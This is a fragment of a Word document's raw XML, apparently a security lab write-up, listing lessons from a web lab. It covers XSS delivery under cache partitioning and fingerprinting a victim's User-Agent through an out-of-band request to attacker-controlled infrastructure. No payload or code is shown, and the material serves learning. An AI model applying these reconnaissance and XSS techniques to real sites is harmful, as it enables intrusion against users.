          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A working payload isn't the same as a solved exploit. The XSS fired in my own browser well before the lab solved, because "does the payload execute" and "does it execute for the intended victim" are separate questions once cache partitioning is involved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-step recon inside the app itself can leak targeting data. The comment feature wasn't the vulnerability — it was the reconnaissance channel that let me passively fingerprint the victim's User-Agent via an out-of-band request to infrastructure I controlled.</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jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Security Lab Writeup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2026-09-06T03:55:01.692Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-06T03:55:01.702Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>